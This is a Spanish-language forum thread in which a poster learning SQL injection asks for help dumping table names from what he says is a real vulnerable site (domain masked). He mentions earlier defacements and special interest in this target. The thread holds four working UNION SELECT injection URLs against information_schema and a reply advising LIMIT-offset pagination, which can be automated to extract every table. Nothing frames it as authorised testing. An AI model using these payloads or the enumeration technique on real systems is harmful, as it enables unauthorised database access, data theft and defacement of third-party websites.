Hola a todos estoy probando las SQLi  ya que no lo habia echo nunca y tengo una duda he encontrado una pagina vulnerable y ya e sacado el numero de columnas la que es vulnerable pero al pedir la lista de tablas no consigo que me la de entera, siempre me corta la lista, he probado concat(table_name), group_concat(table_name) he probado con limites peor nose... alguna idea?

Esta es la url que e probado:

http://www.xxxxxxxx.com/inscripcion.php?id=89%20and%201=0%20union%20all%20select%201,2,3,group_concat%28table_name%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20from%20information_schema.tables%20limit%201000--

http://www.xxxxxxxx.com/inscripcion.php?id=89%20and%201=0%20union%20all%20select%201,2,3,concat%28table_name%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20from%20information_schema.tables%20limit%201000--

http://www.xxxxxxxx.com/inscripcion.php?id=89%20and%201=0%20union%20all%20select%201,2,3,group_concat%28table_name%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20from%20information_schema.tables--

http://www.xxxxxxxx.com/inscripcion.php?id=89%20and%201=0%20union%20all%20select%201,2,3,concat%28table_name%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20from%20information_schema.tables--

Un saludo

Y no puedo hacer nada :S porque jode bastante encontrar la vulnerabilidad y que justo no se vean las tablas buenas :S

Jajaja lo cierto esque ya e echo algun deface pero tenia interes especial en esta web que estoy trabajando ahora....

Pero no entiendo, si muestra algunas tablas, podrías usar un limit para sacarlas una por una... (Un poco tedioso, pero es posible automatizarlo)

+limit+0,1--

de hay vas aumentando

+limit+0,1--
+limit+0,2--
+limit+0,3--